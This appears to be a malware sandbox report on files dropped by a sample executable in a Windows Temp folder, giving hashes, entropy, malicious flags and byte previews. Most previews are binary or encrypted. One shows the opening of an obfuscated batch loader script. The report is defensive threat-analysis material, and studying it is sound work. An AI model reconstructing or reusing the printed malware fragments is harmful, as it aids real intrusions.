                                                                                                                                                                                                                                                                          SHA-512:B14A53EA33B6F44EF4FFFB76060955F9AE85BFED79CA206359FFCDF80AA33D21ABFF41D526E43BA55BC33048FD8A237A2C854E92856F292CB4825304ACFBE3BD
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                          Preview:..YcDf.5...^f......e>:......!...s.d..2.j...i.b..=.Y.z......0...H..j.oW2...rj.srN...7.V..0..?.hSW...wl.q....V..}`T.q.u[.NV5I....r.a"...FK'.@W.._..zh>.x..d..R....p..../.Nd.....f8.F.....2pI.hm......x*.;..:......../,.@?......2..~..I@.+j.S....X..ku..............t....Mq..+zB....HY..".B]....*..8...!C.)`.....AZ5p.....z.J..>..q..;...v.a.........._R.P...F..i.L....+.r|@>K.9..y...+..n....{...g...5.m.....59..c.Y!.0.n.'..M[....?.s#..h.N.......`.[.A......:.s..~..:g=..(NcI.......u/Z.C...I.A.^..Fw.D}....+..@.C78....F....t..c.c.,xUl.....b..j}.Hj4..~..&q=%~......9."dR..q..6,t....^._a6.xM.%...3...%.p.-..81.j(............H-....D..~:-.M...Cq. .t...9.6Rx...%_30...L..........6.x\D..@9`..)..\...P..z^p..I.V.M0.y......(.7.....k.....h.....+.j.&.8.....B)..b..O/r..7....%.M..J.C..".UDk.I.... 3...dT;.n...=m.0F.R.....r..wn....`...d.Tn.}........T.5.#........d<T....Y...i......bQ. .|\n5x...\Q...#y.K..._.(.{.!_...7{.TXzJ....x|...XF<L..@H.....g.-...<..."M.....1.........Aj.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\App

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (798), with CRLF line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):17809
                                                                                                                                                                                                                                                                          Entropy (8bit):5.131067698498597
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:384:epq5NAPPiFt6JXCvH2/gFl3eF2OEgV9Qqnx:epfPPCt6JXgjlmck/x
                                                                                                                                                                                                                                                                          MD5:15687A16A1310BB6DFCB1FB9B8D052B3
                                                                                                                                                                                                                                                                          SHA1:BDA139691A5C3F90F7059D84DBAD98354748832F
                                                                                                                                                                                                                                                                          SHA-256:08F36DA3D5E25C26D14E49BC46995AA1A5842AD368A9E02244DB850F77D4A70F
                                                                                                                                                                                                                                                                          SHA-512:9DFAFA0CF6E7A54037CC53C155C7214580A90B4066D3B469A966F53D363AE63A6A4D9BB08A8DE64796E8C6B36E6A5E8374069952628A81B13EBFE93ABBC51574
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                          Preview:Set Deviant=I..XbxCooling-Monthly-Records-Furnishings-Consolidation-Represents-Tribal-Bumper-Pill-..DJiTransexuales-Supported-Jonathan-Deadly-Rel-Mistress-Later-Scientists-Salary-..anLanguage-French-Kansas-Tuner-Drunk-..DcRespect-Morning-Words-..nZAcquired-Schools-Mere-Harley-Penalties-Spider-Profile-..LKQxSent-Permission-Ag-Rapids-..cNRatios-Emotions-..DDGTim-Describe-..Set Favour=S..paDollars-Bull-Ghana-Background-Researcher-Accreditation-Norway-..zhTexas-Allowing-Uzbekistan-Toolbox-Nv-Asus-Plots-Golf-..kUHelmet-Broker-Warcraft-Accurately-Ol-Competing-Ugly-..aWRoutes-U-Exploring-Diff-Airfare-Budget-Defense-..iPCArtwork-Proven-Film-Features-Wit-Lets-..Set Speaks=y..ZeMattress-Drug-..aiHChallenging-Bank-Hospitality-Mystery-Tony-Affair-Elementary-..WPSFrank-Opinion-Eugene-Puzzles-Future-..uLCorn-Metadata-Sheriff-Austria-Division-Second-After-Finite-South-..FmLatino-Launches-Kidney-Hazard-Congressional-..naZnImplementation-Presents-Lowest-..Set Centered=X..ffPContained-..vChSuit-Graduate

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\App.cmd (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (798), with CRLF line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):17809
                                                                                                                                                                                                                                                                          Entropy (8bit):5.131067698498597
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:384:epq5NAPPiFt6JXCvH2/gFl3eF2OEgV9Qqnx:epfPPCt6JXgjlmck/x
                                                                                                                                                                                                                                                                          MD5:15687A16A1310BB6DFCB1FB9B8D052B3
                                                                                                                                                                                                                                                                          SHA1:BDA139691A5C3F90F7059D84DBAD98354748832F
                                                                                                                                                                                                                                                                          SHA-256:08F36DA3D5E25C26D14E49BC46995AA1A5842AD368A9E02244DB850F77D4A70F
                                                                                                                                                                                                                                                                          SHA-512:9DFAFA0CF6E7A54037CC53C155C7214580A90B4066D3B469A966F53D363AE63A6A4D9BB08A8DE64796E8C6B36E6A5E8374069952628A81B13EBFE93ABBC51574
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                          Preview:Set Deviant=I..XbxCooling-Monthly-Records-Furnishings-Consolidation-Represents-Tribal-Bumper-Pill-..DJiTransexuales-Supported-Jonathan-Deadly-Rel-Mistress-Later-Scientists-Salary-..anLanguage-French-Kansas-Tuner-Drunk-..DcRespect-Morning-Words-..nZAcquired-Schools-Mere-Harley-Penalties-Spider-Profile-..LKQxSent-Permission-Ag-Rapids-..cNRatios-Emotions-..DDGTim-Describe-..Set Favour=S..paDollars-Bull-Ghana-Background-Researcher-Accreditation-Norway-..zhTexas-Allowing-Uzbekistan-Toolbox-Nv-Asus-Plots-Golf-..kUHelmet-Broker-Warcraft-Accurately-Ol-Competing-Ugly-..aWRoutes-U-Exploring-Diff-Airfare-Budget-Defense-..iPCArtwork-Proven-Film-Features-Wit-Lets-..Set Speaks=y..ZeMattress-Drug-..aiHChallenging-Bank-Hospitality-Mystery-Tony-Affair-Elementary-..WPSFrank-Opinion-Eugene-Puzzles-Future-..uLCorn-Metadata-Sheriff-Austria-Division-Second-After-Finite-South-..FmLatino-Launches-Kidney-Hazard-Congressional-..naZnImplementation-Presents-Lowest-..Set Centered=X..ffPContained-..vChSuit-Graduate

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Critics

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):105472
                                                                                                                                                                                                                                                                          Entropy (8bit):6.627402952919146
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3072:H80PtCZEMnVIPPBxT/sZydTmRxlHS3NxrHSB9:cSCOMVIPPL/sZ7HS3zw
                                                                                                                                                                                                                                                                          MD5:8496CEF888EE804F2B8A44171481E40A
                                                                                                                                                                                                                                                                          SHA1:90FCDE8C353D79AE02BFC946D708D35FEDFEA64F
                                                                                                                                                                                                                                                                          SHA-256:0D8671285841832D972CA2576CDB83F412AF8433CF33C511F652912E7FD7E29B
                                                                                                                                                                                                                                                                          SHA-512:158C70A8804E73DFB25A1265328FADC26903C5B035A991AAA570F0EF98F89D616C635E4820E926FB8E00E1C20CFCF3FD441DCC0CA5EEFA109DD5BC23E0E4C61D
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                          Preview:.....8.u..N...9..j.Pj(.6.~..=..I..E...E........u.............h.....u...^.b...PQWj..............}.....................f.}.....u..u.Wt.j..0j............t%j..7..\.I....u..u.W.....t.j...j......E.f.M............}.........u.f....u.Wt.j...j..S....E......w..QH..3.@......E.PV..4.I..E.P....I..E.PV..x.I..E.;E.......;E........E.;E.......;E.~............;...................u....{...j.j.SPW.....N........P.......Pj.j.W....I.SW.%....V...<..........E......j.VWS....I..E.QQ...E..]..E..\$....E..]..E...$.0VWS....I.VWS....I.S....I..U..M.E..j.X.E....E..E....*....E.j.X.u..E....E....E.S.U..M......u.j..u..u.S......M....P.E.....PVWS....I......E.j.X.u..E....E....E.S.U..M..4....u.j..u..u.S.....M....P.E........M.A...+.P.A...+.PVWS....I..<...t+H...t..u......c....}..^.......P....E...G....u.VWS....I..U..M..0....E.9..)M...1...95.)M........ ...P....I..%.)M.......V....I...S............xH.......V.u.h8....]...t..T)M...................V.u.h4....6...t(.T)M............<...h...<...`.......X...V.u.h3....u...x.I

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Doug

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):116736
                                                                                                                                                                                                                                                                          Entropy (8bit):6.265669967004004
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3072:t/Dde6u640ewy4Za9coRC2jfTq8QLeAg0Fuz08XvBNbX:t/Dd314V14ZgP0JaAOz04pd
                                                                                                                                                                                                                                                                          MD5:37F28BCCBCAEA4719409C72AA6385586
                                                                                                                                                                                                                                                                          SHA1:083AD006B92745C976989BC5FB76E7187D81A597
                                                                                                                                                                                                                                                                          SHA-256:7101D14A5FCF7B47A9C6B809155BEA70121C61D2DF7E2244573204C2190CCF45
                                                                                                                                                                                                                                                                          SHA-512:105DE3A0358C0E95B573DD1FC590B27C33F8033158B28A523A5EF9BDBFAA1F488E6B0F7556D6E46D96E23F00392F4EEBDED0DCEA31926A05823EA1B5D4FFF22F
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                          Preview:.L.R.u..;...}......u.2..9.E.f9.t..5H.I.PShC...Q..SShN....7..9..(M.u......f........_^[].(.U..Q.}..SVWu<.}..u...................I..............F.........u{2._^[.....E.P.E.P.u......t.M..@)M..}.......T)M............<.t.<.t.<.t.<.t..y..u.....I..u..F........T)M.......F..A..~..t..........y...U..E(...SV...W;.u.j.X.....P.^M...U,......;.u...E ;.u.......M$;.u.j.Yj.Q.u.QP.u..u.Sj.h`.L.R.u...:...u.....u.2..@.M..U...........j.P...YY.E.Pj.h.....6..H.I..=.(M..u.f........_^[..(.U..E(...u....0.SV.....t...........P.L.....E,...u.......M ...u.......U$...u......3.CSQ.u.RQ.u..u.V.u.hT.I.P.u..:9...u.....u.2..(P..l.I.PPh.....6..H.I..=.(M..u.f........^[].(.U..E(@..S..#E(V.....P..K...M,...U A....#M,...u.......E$...u......3.CSQ.u.PR.u..u.V.u.h,.L.Q.u..8...u.....u.2...j.....I..FL.=.(M..u.f........^[].(.U..E(SVW...u...........P.dK...M,.] A....#M,...u.j [.}$...u.j _3.RQ.u.RR.u..u.PRh..I.Q.u...8...u.....tTf......3.}.f......3.Cf9.tt.E....f........E.f.......E0P.Q......WV..L......u.Q..<.I.2.M0...._^

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Eleven

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):128000
                                                                                                                                                                                                                                                                          Entropy (8bit):6.334318948869726
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3072:UZg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laW2UDQWfu:UK5vPeDkjGgQaE/loUDtfu
                                                                                                                                                                                                                                                                          MD5:3B84985152CD93F2BD04BD909D7C902E
                                                                                                                                                                                                                                                                          SHA1:4BD3D6AF1E4ED7EFE357E707EC7E6AB2E3FF4EEE
                                                                                                                                                                                                                                                                          SHA-256:9DF8E69068B9CE01749FE0A515DB1554C05D491C3A5A4F80F8ABA060EA89950F
                                                                                                                                                                                                                                                                          SHA-512:051D3B9FA3D463D78D1AC971396DCB00D930A9E9C3F7A1278A7DD8027D1AB159F688F912D65D78ADA9F059D73526F987A36CAC0D5100CAE5491959DD059F89DD
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                          Preview:hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B.........................................................................................................................................................................................................................................................................................................t.M.....hi'D......Y.hs'D......Y..r...hx'D......Y..|X..h}'D......Y.Q.I...h.'D.....Y.0$M.Q.@..0$M.P.=B..h.'D.....Y...C..h.'D.....Y.....h.'D..}...Y..+O..h.'D..l...Y..!...h.'D..[...Y.45M....h.'D..E...Y

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Eligibility

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):90112
                                                                                                                                                                                                                                                                          Entropy (8bit):6.669251844476311
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:1536:zzGc/xv5mjKu2IwNnPEBiqXv+G/UXT6TvY464qvI932eOypvcLSDOSpZ+q:v5mjccBiqXvpgF4qv+32eOyKODOSpQq
                                                                                                                                                                                                                                                                          MD5:3EFE58B3BE584C2AFE3D64A453F70DAC
                                                                                                                                                                                                                                                                          SHA1:BA151BDFA43145DC0E3A495AC5382638CFB0A2C1
                                                                                                                                                                                                                                                                          SHA-256:7054A53CE5187D3470517170AF3138DC28CEC4ED1793574A91CCA795FB7E3E10
                                                                                                                                                                                                                                                                          SHA-512:929B0A9AF43360AF0F820FAB936650B211978523B9FDEF00EE563930E03F2A9830E5C2246BE9ACE7F95AB78CFB075E82347CAFB02472B8A09DC4859C9A5232F3
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                          Preview:..0.]..B....t...........B.......It.........U.R.Na....RP.U..B ...t....u...$XZ.]..]...U...u..A...Y].U.....u...P..Y..t..u......Y..t.].}....h....F...U..]...........`K..U....L....j Y+.E...3...L.].U..E.V.H<....A..Q.....A.k.(..;.t..M.;J.r..B..B.;.r...(;.u.3.^]....V......t d........M..P...;.t.3.........u.2.^..^.U..}..u.....M.........-....u.2.]..?$....u.j...-..Y...].U.....=..M..t.....V.u...t....u}.$.....t&..u"h..M.."..Y..u.h..M.."..Y..tF2..K...L..u.W......M.j Y+.....3...L..E.E..E.......M..E.E..u.E...._....M....^..j......j.h..L......e...MZ..f9...@.u].<.@.....@.PE..uL.....f9...@.u>.E....@.+.PQ.^...YY..t'.x$.|!.E..........E..3.8..........e..E.....2..M.d......Y_^[..U.........t..}..u.3....M...].U..=..M..t..}..u..u..."...u..[,..YY..].U....L...3...M.....u.....u...!....h..M..l!..Y..Y....#E.].U...u.......Y....H].U...u..Q...Y].."...j......Y..t.hL.B......Y3..j..S....U..j.h3'D.d.....PSVW...L.3.P.E.d.....h....h..M...8.I.h..J.....I.....u.h,.J.....I...........hH.J.V....I.hd.J.V.....

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Judy

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):71680
                                                                                                                                                                                                                                                                          Entropy (8bit):7.997482190075013
                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                          SSDEEP:1536:UzkS9wznOULQYQQ1YvdhCPF6+XoWW/ej/q57UJZNt+59uxkfQFaxT7k:UzkS9wzNLQYhNvlW/ej/q5oJR69uxk0Z
                                                                                                                                                                                                                                                                          MD5:F5C4EA189E763C79767BB2F4BC471F08
                                                                                                                                                                                                                                                                          SHA1:6ABE10F27AEB64CB3583EC3549D8F84EB23B05EB
                                                                                                                                                                                                                                                                          SHA-256:49B1A81A6965071DB23FE804A6293B87FD2AB96CFDA6E28D806C1E76A53E723E
                                                                                                                                                                                                                                                                          SHA-512:31E79F7A7FC0A5EEA3C4D70B152F75573C43C324B317667F41A824EBB2913D7BF4BACBF08A85D6281EC33ADA2F2BABE2A26D251008288CB6A4CE85E38DBE51D7
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                          Preview:Vz.5..Ff._);.S...jK.;.E......5...mv...%*.F.a..R-A..bv"g'5.3..b.e.$...[$D!..>..uT.j.....NY.K.p...ig.O@=..U_r.R......W.~/|......R.&.s...A-.y..d.....p...8T....$..b.k......gT...*..2.."f...0...T../..0,..#X.1.j...W.%)@\....3.B|........m.0...V7.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....R}...N.8.'.F...h..............R.."...R.."..kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r..t. ..,P..Myn.2..t.W............<..R.......R.."..m.....8..r..5...x..2).U.j....R>..#.~.....b(..|......\.....k.LX....=.#=.....a.'....-??!?..H.`u.......f...g...I..Wz .......7.Pr..+.Q~..S.e.w..@...tj...)...=.6`)PP;v,8.lA_>y.m.......a....C.........c{...9,....=Ip....6..d.g...c8.XCloB.....U.M.|......od.8...|..0k.&Tc.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Organizing

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):239
                                                                                                                                                                                                                                                                          Entropy (8bit):4.917953550006691
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:ox3FqjvVg3F+X32+hZCt7HSbYwClS6CSNN:63FyGSG+fCtJfjN
                                                                                                                                                                                                                                                                          MD5:28A97FEBFC5CD391BEC1E2A3D9D938BF
                                                                                                                                                                                                                                                                          SHA1:ADEA302B1D73D65C4C2A64F4F10955D5E4D728AA
                                                                                                                                                                                                                                                                          SHA-256:2528CD8D1353E6C4DBCC6D2226B5B50EF14027A962A49C4001D2C8C072904773
                                                                                                                                                                                                                                                                          SHA-512:7BBB7F7781C77740EFC6361C5195A01F854C3CA1AFD9EC7870C4F87C5A28432AF97D61A41E4AF0D2D3CEA45FA3565E297FC08CD7ACA91831792DF0A81EFE0F82
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                          Preview:profiles........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Origin

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):64512
                                                                                                                                                                                                                                                                          Entropy (8bit):4.7517361763863475
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:384:+Oa3HwwuBcozc/mwftIQXoSpu88888888888888888888888888888zv888888NR:TaAwuXc/mex/Sg
                                                                                                                                                                                                                                                                          MD5:7BBDCF2829F157F4178AD1A4EA31BFE6
                                                                                                                                                                                                                                                                          SHA1:AFC7C5852F104D94FC2726B3230039B696F17FC2
                                                                                                                                                                                                                                                                          SHA-256:BAC794EE8129A6EDAA06FED424A8839D24B6B8E6A75C4F23BC8C3E7735498818
                                                                                                                                                                                                                                                                          SHA-512:D2DD73E8F2B965B9BF9BB806C639AF654646D76628E5C707F29EDE16A1634DD5A699FB239C83C4BCF492B03E2941129AFFC777C39B9851F948A96F537DC844FF
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                          Preview:.".......".......".......".......4.......'.......'.......'.......'.......'.......'...............................................Z.......Z.......Z.......Z.......Z.......Z.......Z...............=.......=.......=.......=.......=.......=.......K.......K.......K.......K.......\.......\.......\.......\.......E.......E.......E.......E.......E.......H.......H.......H.......H.......K.......................................!.......!.......!..?....!..?....!..?....!...A.......................J.......V.......d...............p.......~......................................................................................................................................C....!..GA...!..K....!.......!.......!.......!.......!...................................0...........!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......................................................:.......:.......:.......:......................................................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Saved

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):68465
                                                                                                                                                                                                                                                                          Entropy (8bit):7.005168590448056
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:1536:uu0uZo2+9BGmdATGODv7xvTphAiPChgZ2kOE6:u4ZNoGmROL7F1G7ho2kOb
                                                                                                                                                                                                                                                                          MD5:53AB895BB726A4933DD1DC3F2FA2E5F8
                                                                                                                                                                                                                                                                          SHA1:3933C015286DE1871305AC17679D7244E0C73A07
                                                                                                                                                                                                                                                                          SHA-256:230C6C15BB57BCB9566D03A0940EB2D8CBB52FD2807CB195982C2541EF7EBBC2
                                                                                                                                                                                                                                                                          SHA-512:3FFB82FB40E8FF1D98D395601DE10BEB59AF9F77AF6300DBA79E2436EA787EE7DCE026DD43CDDA324515F81EC7B5F48E1DF396CFC3568128468C3CC5E663682B
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                          Preview:.".#"=.v......;aoG..{.i.l?#...<4.a0.k.&....CK..v..........io.w.......W$....d.O..%...G.........l...`qq..;....w.....x..L7..G.1...=].....vd..\Xq.:Uu...... "m@.....9.w....]..J.....bawS~.[]W`n......-..p?.>.H. ...l.J..i.E....v..kk....~..m......+.8uy..w.i...Gw6...P..e'..H.i.....8...].....V.....9.............|..8.zc.kSY.=..T....'..l.qc:.|..q.f.U..m;.t..[g...:.'"..Mrlw...~.....MR.X.,.q..,y.....7....Ns`g....(U.....<....P...=.8.[.....2.V.<.....:/..bb..z*.+.....[.NT..... .vg.KG.]f.l..9..t....y1ZZZ|"..{L.yPG..Z..m.r|o7C.qW.cm..+.\.[..w.[....&.]=.....rlw..6;.T,...G..".....3T5 "}...T.X*l`Y./......OV][..`,[.9....FT.Vg3.vq....wD.orhg..C..:.l...........>U...e.T...V.......(Rm....sW.c1...N09....=.-...gx......IDZ........0..Z...q2U.,+`.....z.......H.Z...~.;.....^..oNpi|.$\*[|..$7g./.......Z...p.lQXw..........y..\w-.w.M.....K...w.....g..|...'..+......%X,[.:...... ..=.+.e.#.Nc.'.}...W...c......n..+.l....b...vw..;.t.Q..J.S.a.@.P.>......E........~:\nr..y..

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Sensor

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):118784
                                                                                                                                                                                                                                                                          Entropy (8bit):6.610127089636133
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3072:ywS2u5hVOoQ7t8T6pUkBJR8CThpmESv+AqVnBypIbv18mLtA:yb2j6AUkB0CThp6vmVnjpA
                                                                                                                                                                                                                                                                          MD5:3B125D59CE5A2CF242A621511A0FB164
                                                                                                                                                                                                                                                                          SHA1:3CCBA09F214B941931D6169CA9959ACE2A72ABA7
                                                                                                                                                                                                                                                                          SHA-256:E4C1FBEDC713173BCEF5C724F3D64283ADD852A64F65C87EB3EC8D86C55833AA
                                                                                                                                                                                                                                                                          SHA-512:C026F9AA8E83F2C888E2B8336C7EC8380D34873956407E32FAE31FD72BDA741B72C649B7162587435E3D13B9B9FAE8E0552330D710831C774264724C8589F36C
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                          Preview:xs.]..C<.M.;..t..4......V.M..t....M..i8....u=...y..A..~=.@<.M.;..t..4.....V.M..A....M..68....u..E.C;.|....u.V...YY.M..4.......2._^[....V...N..V..F......t.Q......F..V..$..^.U..V.u.j......Y.M.Qj.VP.....p..0.......^].3..A.f.A..u......U..U.;.t".....B..A..B..A..B..A..B..A..B..A...]....A .......9.|......S....A .......9A.|..A....:...U.......3.V.u.W....f.F.9G ............P....I.....R........8E.t.8.....u.....u....8E.u.....u..F..8.....u.....u..F..8.....u.....u..F..8.[....................F.......Sh........I.....I......f..u.h..........f..t.....u....h........I......f..u.h..........f..t.....u..F..j.....I......f..u.j.......f..t.....u..F..j.....I......f..u.j.......f..t.....u..F..j[....I......f..u.j[......f..t.....u..F..[_..^....U..QQS..3.V..E.W.x.CO.&..e....xPW.....j0Y...f;.r...9w.+.....Ar...Fw...7....ar%..fw ..W........O.E.@.E.....E.|....t..&.2....._^[..y..........<.......<-......<.......<#......<(t.<"t{<%tw<'ts<$to<&tk<!tg<otc<]t_<[t[<\tW<.tS<.tO<_tK<.tG<.tC<.t?<.t;<.t7<.t3<.t/<.t+<.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Sheets

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):62464
                                                                                                                                                                                                                                                                          Entropy (8bit):7.996893383300018
                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                          SSDEEP:1536:BUSTLYdN5/qM8GDI99k/fG3EwYkRinZI6I6+bit:u+L8H/pmk20DnZI6m2
                                                                                                                                                                                                                                                                          MD5:D947E72346C4AC1ABA8BBDE8BB791F6F
                                                                                                                                                                                                                                                                          SHA1:F6DC2CFFBC0B29502CBA42D9ADEE2263A7FF4835
                                                                                                                                                                                                                                                                          SHA-256:A6E6FC90D3C04E2461E3017E9F1DBAA27ABB9278F5DB7BB09A218A3A969FEB41
                                                                                                                                                                                                                                                                          SHA-512:61E4A6BFB253D4FCF21781324C6DD7B2DFF0750075BFE4CCAFFFF07A4D2FA552016DFB343BB835BFC7E7D6FD80B2B35B9519F2D6958885502758138BAB764E9C
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Reputation:unknown
